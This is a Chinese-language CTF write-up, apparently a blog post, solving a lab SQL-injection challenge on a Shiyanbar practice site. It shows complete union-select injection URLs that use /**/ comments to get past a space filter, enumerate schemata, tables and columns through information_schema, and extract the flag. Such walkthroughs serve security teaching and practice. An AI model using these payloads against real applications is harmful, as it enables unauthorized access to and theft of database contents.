CFT每日一题之简单的SQL注入之二

本文通过一个具体的案例展示了如何利用SQL注入漏洞获取敏感信息。从尝试性输入到逐步构造复杂查询语句,最终成功提取数据库中的flag数据。

首先,输入1 尝试一下


然后爆出ID 加 个 单引号 尝试 ,出现报错界面

然后 大概猜测代码是  select xx from XX where id=''

用and测试

发现了有过滤,经过多测实验后,发现去掉空格就可以


然后开始构造,我们可以使用/**/来代替空格

http://ctf5.shiyanbar.com/web/index_2.php?id=-1%27/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/%271%27=%271

然后就可以一层一层往下查了

http://ctf5.shiyanbar.com/web/index_2.php?id=-1%27/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/%271%27=%271


然后查询列,获得flag列

http://ctf5.shiyanbar.com/web/index_2.php?id=-1%27/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/%271%27=%271


最后查询flag列的数据

http://ctf5.shiyanbar.com/web/index_2.php?id=-11%27/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/%271%27=%271


评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值